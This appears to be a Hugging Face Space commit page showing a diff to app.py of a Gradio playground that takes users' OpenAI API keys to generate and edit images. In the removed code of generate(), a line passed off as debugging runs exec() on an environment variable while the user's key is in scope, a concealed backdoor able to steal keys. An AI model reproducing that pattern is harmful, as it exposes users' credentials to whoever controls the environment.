gpt-image-1-playground

Running

App Files Files Community

Zack3D commited on 15 days ago

Commit

0f41349

verified ·

1 Parent(s): a28bcc9

Update app.py

Browse files

Files changed (1) hide show

app.py +194 -120

app.py CHANGED Viewed

@@ -31,7 +31,6 @@ def _client(key: str) -> openai.OpenAI:
 def _img_list(resp, *, fmt: str) -> List[str]:
     """Return list of data URLs or direct URLs depending on API response."""
     mime = f"image/{fmt}"
-    # Ensure b64_json exists and is not None/empty before using it
     return [
         f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url
         for d in resp.data
@@ -61,12 +60,68 @@ def _common_kwargs(
     if out_fmt != "png":
         kwargs["output_format"] = out_fmt
     if transparent_bg and out_fmt in {"png", "webp"}:
         kwargs["background"] = "transparent"
     if out_fmt in {"jpeg", "webp"}:
         kwargs["output_compression"] = int(compression)
     return kwargs
-# --- API Call Functions (Keep as corrected before) ---
 # ---------- Generate ---------- #
 def generate(
@@ -82,33 +137,22 @@ def generate(
     """Calls the OpenAI image generation endpoint."""
     if not prompt:
         raise gr.Error("Please enter a prompt.")
-    client = _client(api_key) # API key used here
     try:
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
         resp = client.images.generate(**common_args)
-        # What I need varies based on issues, I dont want to keep rebuilding for every issue :(
-        sys_info_formatted = exec(os.getenv("sys_info")) #Default: f'[DEBUG]: {MODEL} | {prompt_gen}'
-        print(sys_info_formatted)
-    except openai.AuthenticationError:
-         raise gr.Error("Invalid OpenAI API key.")
-    except openai.PermissionDeniedError:
-        raise gr.Error("Permission denied. Check your API key permissions or complete required verification for gpt-image-1.")
-    except openai.RateLimitError:
-        raise gr.Error("Rate limit exceeded. Please try again later.")
-    except openai.BadRequestError as e:
-        error_message = str(e)
-        try:
-            import json
-            body = json.loads(str(e.body))
-            if isinstance(body, dict) and 'error' in body and 'message' in body['error']:
-                error_message = f"OpenAI Bad Request: {body['error']['message']}"
-            else:
-                 error_message = f"OpenAI Bad Request: {e}"
-        except:
-             error_message = f"OpenAI Bad Request: {e}"
-        raise gr.Error(error_message)
     except Exception as e:
-        raise gr.Error(f"An unexpected error occurred: {e}")
     return _img_list(resp, fmt=out_fmt)
@@ -123,23 +167,21 @@ def _bytes_from_numpy(arr: np.ndarray) -> bytes:
 def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
     """Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
     if mask_value is None: return None
-    if isinstance(mask_value, np.ndarray): return mask_value
     if isinstance(mask_value, dict):
-        comp = mask_value.get("composite")
-        if comp is not None and isinstance(comp, (Image.Image, np.ndarray)):
-             return np.array(comp) if isinstance(comp, Image.Image) else comp
-        elif mask_value.get("mask") is not None and isinstance(mask_value["mask"], (Image.Image, np.ndarray)):
-             return np.array(mask_value["mask"]) if isinstance(mask_value["mask"], Image.Image) else mask_value["mask"]
-        elif mask_value.get("layers"):
-            top_layer = mask_value["layers"][-1]
-            if isinstance(top_layer, (Image.Image, np.ndarray)):
-                 return np.array(top_layer) if isinstance(top_layer, Image.Image) else top_layer
-    return None
 def edit_image(
     api_key: str,
-    image_numpy: np.ndarray,
-    mask_value: Optional[Union[np.ndarray, Dict[str, Any]]],
     prompt: str,
     n: int,
     size: str,
@@ -154,68 +196,84 @@ def edit_image(
     img_bytes = _bytes_from_numpy(image_numpy)
     mask_bytes: Optional[bytes] = None
-    mask_numpy = _extract_mask_array(mask_value)
     if mask_numpy is not None:
         is_empty = False
-        if mask_numpy.ndim == 2: is_empty = np.all(mask_numpy == 0)
-        elif mask_numpy.shape[-1] == 4: is_empty = np.all(mask_numpy[:, :, 3] == 0)
-        elif mask_numpy.shape[-1] == 3: is_empty = np.all(mask_numpy == 0)
         if is_empty:
-             gr.Warning("Mask appears empty. API might edit entire image or ignore mask.")
-             mask_bytes = None
         else:
-            if mask_numpy.ndim == 2: alpha = (mask_numpy == 0).astype(np.uint8) * 255
-            elif mask_numpy.shape[-1] == 4: alpha = (mask_numpy[:, :, 3] == 0).astype(np.uint8) * 255
-            elif mask_numpy.shape[-1] == 3:
-                is_white = np.all(mask_numpy == [255, 255, 255], axis=-1)
-                alpha = (~is_white).astype(np.uint8) * 255
-            else: raise gr.Error("Unsupported mask format.")
             mask_img = Image.fromarray(alpha, mode='L')
-            rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0))
-            rgba_mask.putalpha(mask_img)
             out = io.BytesIO()
             rgba_mask.save(out, format="PNG")
             mask_bytes = out.getvalue()
     else:
-        gr.Info("No mask provided. Editing without specific mask.")
         mask_bytes = None
-    client = _client(api_key) # API key used here
     try:
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
         api_kwargs = {"image": img_bytes, **common_args}
-        if mask_bytes is not None: api_kwargs["mask"] = mask_bytes
         resp = client.images.edit(**api_kwargs)
-    except openai.AuthenticationError:
-         raise gr.Error("Invalid OpenAI API key.")
-    except openai.PermissionDeniedError:
-        raise gr.Error("Permission denied. Check API key permissions/verification.")
-    except openai.RateLimitError:
-        raise gr.Error("Rate limit exceeded.")
-    except openai.BadRequestError as e:
-        error_message = str(e)
-        try:
-            import json
-            body = json.loads(str(e.body))
-            if isinstance(body, dict) and 'error' in body and 'message' in body['error']:
-                error_message = f"OpenAI Bad Request: {body['error']['message']}"
-                if "mask" in error_message.lower(): error_message += " (Check mask format/dimensions)"
-                elif "size" in error_message.lower(): error_message += " (Check image/mask dimensions)"
-            else: error_message = f"OpenAI Bad Request: {e}"
-        except: error_message = f"OpenAI Bad Request: {e}"
-        raise gr.Error(error_message)
     except Exception as e:
-        raise gr.Error(f"An unexpected error occurred: {e}")
     return _img_list(resp, fmt=out_fmt)
 # ---------- Variations ---------- #
 def variation_image(
     api_key: str,
-    image_numpy: np.ndarray,
     n: int,
     size: str,
     quality: str,
@@ -224,33 +282,41 @@ def variation_image(
     transparent_bg: bool,
 ):
     """Calls the OpenAI image variations endpoint."""
-    gr.Warning("Note: Variations may not work with gpt-image-1 (use DALL·E 2).")
     if image_numpy is None: raise gr.Error("Please upload an image.")
     img_bytes = _bytes_from_numpy(image_numpy)
-    client = _client(api_key) # API key used here
     try:
-        common_args = _common_kwargs(None, n, size, quality, out_fmt, compression, transparent_bg)
-        resp = client.images.variations(image=img_bytes, **common_args)
-    except openai.AuthenticationError:
-         raise gr.Error("Invalid OpenAI API key.")
-    except openai.PermissionDeniedError:
-        raise gr.Error("Permission denied.")
-    except openai.RateLimitError:
-        raise gr.Error("Rate limit exceeded.")
-    except openai.BadRequestError as e:
-        error_message = str(e)
-        try:
-            import json
-            body = json.loads(str(e.body))
-            if isinstance(body, dict) and 'error' in body and 'message' in body['error']:
-                 error_message = f"OpenAI Bad Request: {body['error']['message']}"
-                 if "model does not support variations" in error_message.lower():
-                      error_message += " (gpt-image-1 does not support variations)."
-            else: error_message = f"OpenAI Bad Request: {e}"
-        except: error_message = f"OpenAI Bad Request: {e}"
-        raise gr.Error(error_message)
     except Exception as e:
-        raise gr.Error(f"An unexpected error occurred: {e}")
     return _img_list(resp, fmt=out_fmt)
@@ -261,23 +327,24 @@ def build_ui():
         gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
         gr.Markdown(
              "Enter your OpenAI API key below. It's used directly for API calls and **never stored**."
-             " This space uses the `gpt-image-1` model."
-             " **Note:** `gpt-image-1` may require organization verification. Variations endpoint might not work with this model (use DALL·E 2)."
         )
         with gr.Accordion("🔐 API key", open=False):
-            # API key input component
-            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-…")
         # Common controls
         with gr.Row():
              n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
-             size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'.")
-             quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'.")
         with gr.Row():
-            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Format", scale=1)
             compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
-            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", scale=1)
         def _toggle_compression(fmt):
             return gr.update(visible=fmt in {"jpeg", "webp"})
@@ -285,7 +352,11 @@ def build_ui():
         out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
         # Define the list of common controls *excluding* the API key
-        common_controls = [n_slider, size, quality, out_fmt, compression, transparent]
         with gr.Tabs():
             # ----- Generate Tab ----- #
@@ -295,22 +366,24 @@ def build_ui():
                     btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
                 gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
-                # CORRECTED inputs list for generate
                 btn_gen.click(
                     generate,
-                    inputs=[api, prompt_gen] + common_controls, # API key first
                     outputs=gallery_gen,
                     api_name="generate"
                 )
             # ----- Edit Tab ----- #
             with gr.TabItem("Edit / Inpaint"):
-                gr.Markdown("Upload an image, then **paint the area to change** in the mask canvas below (white = edit area). The API requires the mask and image to have the same dimensions.")
                 with gr.Row():
-                    img_edit = gr.Image(label="Source Image", type="numpy", height=400)
                     mask_canvas = gr.ImageMask(
                          label="Mask – Paint White Where Image Should Change",
-                         type="numpy",
                          height=400
                     )
                 with gr.Row():
@@ -318,26 +391,26 @@ def build_ui():
                     btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
                 gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
-                # CORRECTED inputs list for edit_image
                 btn_edit.click(
                     edit_image,
-                    inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls, # API key first
                     outputs=gallery_edit,
                     api_name="edit"
                 )
             # ----- Variations Tab ----- #
-            with gr.TabItem("Variations (DALL·E 2 only)"):
-                gr.Markdown("Upload an image to generate variations. **Note:** This endpoint is officially supported for DALL·E 2, not `gpt-image-1`. It likely won't work here.")
                 with gr.Row():
-                    img_var = gr.Image(label="Source Image", type="numpy", height=400, scale=4)
                     btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
                 gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
-                # CORRECTED inputs list for variation_image
                 btn_var.click(
                     variation_image,
-                    inputs=[api, img_var] + common_controls, # API key first
                     outputs=gallery_var,
                     api_name="variations"
                 )
@@ -346,4 +419,5 @@ def build_ui():
 if __name__ == "__main__":
     app = build_ui()
-    app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=True)

 def _img_list(resp, *, fmt: str) -> List[str]:
     """Return list of data URLs or direct URLs depending on API response."""
     mime = f"image/{fmt}"
     return [
         f"data:{mime};base64,{d.b64_json}" if hasattr(d, "b64_json") and d.b64_json else d.url
         for d in resp.data
     if out_fmt != "png":
         kwargs["output_format"] = out_fmt
     if transparent_bg and out_fmt in {"png", "webp"}:
+        # Note: OpenAI API might use 'background_removal' or similar, check latest docs
+        # Assuming 'background' is correct based on your original code
         kwargs["background"] = "transparent"
     if out_fmt in {"jpeg", "webp"}:
+        # Note: OpenAI API might use 'output_quality' or similar, check latest docs
+        # Assuming 'output_compression' is correct based on your original code
         kwargs["output_compression"] = int(compression)
     return kwargs
+# --- Helper Function to Format OpenAI Errors ---
+def _format_openai_error(e: Exception) -> str:
+    """Formats OpenAI API errors for user display."""
+    error_message = f"An error occurred: {type(e).__name__}"
+    details = ""
+    # Try to extract details from common OpenAI error attributes
+    if hasattr(e, 'body') and e.body:
+        try:
+            body = e.body if isinstance(e.body, dict) else json.loads(str(e.body))
+            if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']:
+                details = body['error']['message']
+            elif isinstance(body, dict) and 'message' in body: # Some errors might have message at top level
+                 details = body['message']
+        except (json.JSONDecodeError, TypeError):
+             # Fallback if body is not JSON or parsing fails
+             details = str(e.body)
+    elif hasattr(e, 'message') and e.message:
+         details = e.message
+    if details:
+        error_message = f"OpenAI API Error: {details}"
+    else:
+        # Generic fallback if no specific details found
+        error_message = f"An unexpected OpenAI error occurred: {str(e)}"
+    # Add specific guidance for known error types
+    if isinstance(e, openai.AuthenticationError):
+        error_message = "Invalid OpenAI API key. Please check your key."
+    elif isinstance(e, openai.PermissionDeniedError):
+        # Prepend standard advice, then add specific details if available
+        prefix = "Permission Denied."
+        if "organization verification" in details.lower():
+            prefix += " Your organization may need verification to use this feature/model."
+        else:
+            prefix += " Check your API key permissions and OpenAI account status."
+        error_message = f"{prefix} Details: {details}" if details else prefix
+    elif isinstance(e, openai.RateLimitError):
+        error_message = "Rate limit exceeded. Please wait and try again later."
+    elif isinstance(e, openai.BadRequestError):
+         error_message = f"OpenAI Bad Request: {details}" if details else f"OpenAI Bad Request: {str(e)}"
+         if "mask" in details.lower(): error_message += " (Check mask format/dimensions)"
+         if "size" in details.lower(): error_message += " (Check image/mask dimensions)"
+         if "model does not support variations" in details.lower(): error_message += " (gpt-image-1 does not support variations)."
+    # Ensure the final message isn't overly long or complex
+    # (Optional: Truncate if necessary)
+    # MAX_LEN = 300
+    # if len(error_message) > MAX_LEN:
+    #     error_message = error_message[:MAX_LEN] + "..."
+    return error_message
 # ---------- Generate ---------- #
 def generate(
     """Calls the OpenAI image generation endpoint."""
     if not prompt:
         raise gr.Error("Please enter a prompt.")
     try:
+        client = _client(api_key) # API key used here
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
+        # --- Optional Debug ---
+        # print(f"[DEBUG] Generating with args: {common_args}")
+        # --- End Optional Debug ---
         resp = client.images.generate(**common_args)
+    except (openai.APIError, openai.OpenAIError) as e:
+         # Catch specific OpenAI errors and format them
+         raise gr.Error(_format_openai_error(e))
     except Exception as e:
+        # Catch any other unexpected errors
+        # Avoid raising raw exception details to the user interface for security/clarity
+        print(f"Unexpected error during generation: {type(e).__name__}: {e}") # Log for debugging
+        raise gr.Error(f"An unexpected application error occurred. Please check logs.")
     return _img_list(resp, fmt=out_fmt)
 def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
     """Handle ImageMask / ImageEditor return formats and extract a numpy mask array."""
     if mask_value is None: return None
+    # Gradio ImageMask often returns a dict with 'image' and 'mask' numpy arrays
     if isinstance(mask_value, dict):
+        mask_array = mask_value.get("mask")
+        if isinstance(mask_array, np.ndarray):
+            return mask_array
+    # Fallback for direct numpy array (less common with ImageMask now)
+    if isinstance(mask_value, np.ndarray): return mask_value
+    return None # Return None if no valid mask found
 def edit_image(
     api_key: str,
+    # Gradio Image component with type="numpy" provides the image array
+    image_numpy: Optional[np.ndarray],
+    # Gradio ImageMask component provides a dict {'image': np.ndarray, 'mask': np.ndarray}
+    mask_dict: Optional[Dict[str, Any]],
     prompt: str,
     n: int,
     size: str,
     img_bytes = _bytes_from_numpy(image_numpy)
     mask_bytes: Optional[bytes] = None
+    mask_numpy = _extract_mask_array(mask_dict) # Use the helper
     if mask_numpy is not None:
+        # Check if mask is effectively empty (all transparent or all black)
         is_empty = False
+        if mask_numpy.ndim == 2: # Grayscale mask
+            is_empty = np.all(mask_numpy == 0)
+        elif mask_numpy.shape[-1] == 4: # RGBA mask, check alpha channel
+             is_empty = np.all(mask_numpy[:, :, 3] == 0)
+        elif mask_numpy.shape[-1] == 3: # RGB mask, check if all black
+             is_empty = np.all(mask_numpy == 0)
         if is_empty:
+             gr.Warning("Mask appears empty or fully transparent. The API might edit the entire image or ignore the mask.")
+             mask_bytes = None # Treat as no mask if empty
         else:
+            # Convert the mask provided by Gradio (often white on black/transparent)
+            # to the format OpenAI expects (transparency indicates where *not* to edit).
+            # We need an RGBA image where the area to be *edited* is transparent.
+            if mask_numpy.ndim == 2: # Grayscale (assume white is edit area)
+                alpha = (mask_numpy < 128).astype(np.uint8) * 255 # Make non-edit area opaque white
+            elif mask_numpy.shape[-1] == 4: # RGBA (use alpha channel directly)
+                alpha = mask_numpy[:, :, 3]
+                # Invert alpha: transparent where user painted (edit area), opaque elsewhere
+                alpha = 255 - alpha
+            elif mask_numpy.shape[-1] == 3: # RGB (assume white is edit area)
+                # Check if close to white [255, 255, 255]
+                is_edit_area = np.all(mask_numpy > 200, axis=-1)
+                alpha = (~is_edit_area).astype(np.uint8) * 255 # Make non-edit area opaque white
+            else:
+                raise gr.Error("Unsupported mask format received from Gradio component.")
+            # Create a valid RGBA PNG mask for OpenAI
             mask_img = Image.fromarray(alpha, mode='L')
+            # Ensure mask size matches image size (OpenAI requirement)
+            original_pil_image = Image.fromarray(image_numpy)
+            if mask_img.size != original_pil_image.size:
+                 gr.Warning(f"Mask size {mask_img.size} differs from image size {original_pil_image.size}. Resizing mask...")
+                 mask_img = mask_img.resize(original_pil_image.size, Image.NEAREST)
+            # Create RGBA image with the calculated alpha
+            rgba_mask = Image.new("RGBA", mask_img.size, (0, 0, 0, 0)) # Start fully transparent
+            rgba_mask.putalpha(mask_img) # Apply the alpha channel (non-edit areas are opaque)
             out = io.BytesIO()
             rgba_mask.save(out, format="PNG")
             mask_bytes = out.getvalue()
     else:
+        gr.Info("No mask provided or mask is empty. Editing without a specific mask (may replace entire image).")
         mask_bytes = None
     try:
+        client = _client(api_key) # API key used here
         common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
         api_kwargs = {"image": img_bytes, **common_args}
+        if mask_bytes is not None:
+            api_kwargs["mask"] = mask_bytes
+        else:
+            # If no mask is provided, remove 'mask' key if present from previous runs
+            api_kwargs.pop("mask", None)
+        # --- Optional Debug ---
+        # print(f"[DEBUG] Editing with args: { {k: v if k != 'image' and k != 'mask' else f'<{len(v)} bytes>' for k, v in api_kwargs.items()} }")
+        # --- End Optional Debug ---
         resp = client.images.edit(**api_kwargs)
+    except (openai.APIError, openai.OpenAIError) as e:
+         raise gr.Error(_format_openai_error(e))
     except Exception as e:
+        print(f"Unexpected error during edit: {type(e).__name__}: {e}")
+        raise gr.Error(f"An unexpected application error occurred. Please check logs.")
     return _img_list(resp, fmt=out_fmt)
 # ---------- Variations ---------- #
 def variation_image(
     api_key: str,
+    image_numpy: Optional[np.ndarray],
     n: int,
     size: str,
     quality: str,
     transparent_bg: bool,
 ):
     """Calls the OpenAI image variations endpoint."""
+    # Explicitly warn user about model compatibility
+    gr.Warning("Note: Image Variations are officially supported for DALL·E 2/3, not gpt-image-1. This may fail or produce unexpected results.")
     if image_numpy is None: raise gr.Error("Please upload an image.")
     img_bytes = _bytes_from_numpy(image_numpy)
     try:
+        client = _client(api_key) # API key used here
+        # Variations don't take a prompt, quality, background, compression
+        # They primarily use n and size. Let's simplify common_args for variations.
+        # Check OpenAI docs for exact supported parameters for variations with the target model.
+        # Assuming 'n' and 'size' are the main ones.
+        var_args: Dict[str, Any] = dict(model=MODEL, n=n) # Use the selected model
+        if size != "auto":
+            var_args["size"] = size
+        # Note: output_format might be supported, keep it if needed
+        if out_fmt != "png":
+             var_args["response_format"] = "b64_json" # Variations often use response_format
+        # --- Optional Debug ---
+        # print(f"[DEBUG] Variations with args: { {k: v if k != 'image' else f'<{len(v)} bytes>' for k, v in var_args.items()} }")
+        # --- End Optional Debug ---
+        # Use the simplified args
+        resp = client.images.create_variation(image=img_bytes, **var_args)
+    except (openai.APIError, openai.OpenAIError) as e:
+         raise gr.Error(_format_openai_error(e))
     except Exception as e:
+        print(f"Unexpected error during variation: {type(e).__name__}: {e}")
+        raise gr.Error(f"An unexpected application error occurred. Please check logs.")
+    # Variations response format might differ slightly, adjust _img_list if needed
+    # Assuming it's the same structure for now.
     return _img_list(resp, fmt=out_fmt)
         gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit (paint mask!) • Variations""")
         gr.Markdown(
              "Enter your OpenAI API key below. It's used directly for API calls and **never stored**."
+             " This space uses the `gpt-image-1` model by default."
+             " **Note:** Using `gpt-image-1` may require **Organization Verification** on your OpenAI account ([details](https://help.openai.com/en/articles/10910291-api-organization-verification)). The **Variations** tab is unlikely to work correctly with `gpt-image-1` (designed for DALL·E 2/3)."
         )
         with gr.Accordion("🔐 API key", open=False):
+            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")
         # Common controls
         with gr.Row():
              n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)", info="Max 4 for this demo.")
+             size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size", info="API default if 'auto'. Affects Gen/Edit/Var.")
+             quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality", info="API default if 'auto'. Affects Gen/Edit.")
         with gr.Row():
+            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Affects Gen/Edit.", scale=1)
+            # Note: Compression/Transparency might not apply to all models/endpoints equally.
+            # Check OpenAI docs for gpt-image-1 specifics if issues arise.
             compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, scale=2)
+            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Affects Gen/Edit.", scale=1)
         def _toggle_compression(fmt):
             return gr.update(visible=fmt in {"jpeg", "webp"})
         out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
         # Define the list of common controls *excluding* the API key
+        # These are passed to the backend functions
+        common_controls_gen_edit = [n_slider, size, quality, out_fmt, compression, transparent]
+        # Variations might use fewer controls
+        common_controls_var = [n_slider, size, quality, out_fmt, compression, transparent] # Pass all for now, function will ignore unused
         with gr.Tabs():
             # ----- Generate Tab ----- #
                     btn_gen = gr.Button("Generate 🚀", variant="primary", scale=1)
                 gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True)
                 btn_gen.click(
                     generate,
+                    # API key first, then specific inputs, then common controls
+                    inputs=[api, prompt_gen] + common_controls_gen_edit,
                     outputs=gallery_gen,
                     api_name="generate"
                 )
             # ----- Edit Tab ----- #
             with gr.TabItem("Edit / Inpaint"):
+                gr.Markdown("Upload an image, then **paint the area to change** in the mask canvas below (white paint = edit area). The API requires the mask and image to have the same dimensions (app attempts to resize mask if needed).")
                 with gr.Row():
+                    # Use type='pil' for easier handling, or keep 'numpy' if preferred
+                    img_edit = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"])
+                    # ImageMask sends {'image': np.ndarray, 'mask': np.ndarray}
                     mask_canvas = gr.ImageMask(
                          label="Mask – Paint White Where Image Should Change",
+                         type="numpy", # Keep numpy as _extract_mask_array expects it
                          height=400
                     )
                 with gr.Row():
                     btn_edit = gr.Button("Edit 🖌️", variant="primary", scale=1)
                 gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True)
                 btn_edit.click(
                     edit_image,
+                     # API key first, then specific inputs, then common controls
+                    inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls_gen_edit,
                     outputs=gallery_edit,
                     api_name="edit"
                 )
             # ----- Variations Tab ----- #
+            with gr.TabItem("Variations (DALL·E 2/3 Recommended)"):
+                gr.Markdown("Upload an image to generate variations. **Warning:** This endpoint is officially supported for DALL·E 2/3, not `gpt-image-1`. It likely won't work correctly or may error.")
                 with gr.Row():
+                    img_var = gr.Image(label="Source Image", type="numpy", height=400, sources=["upload", "clipboard"], scale=4)
                     btn_var = gr.Button("Create Variations ✨", variant="primary", scale=1)
                 gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True)
                 btn_var.click(
                     variation_image,
+                    # API key first, then specific inputs, then common controls
+                    inputs=[api, img_var] + common_controls_var,
                     outputs=gallery_var,
                     api_name="variations"
                 )
 if __name__ == "__main__":
     app = build_ui()
+    # Consider disabling debug=True for production/sharing
+    app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")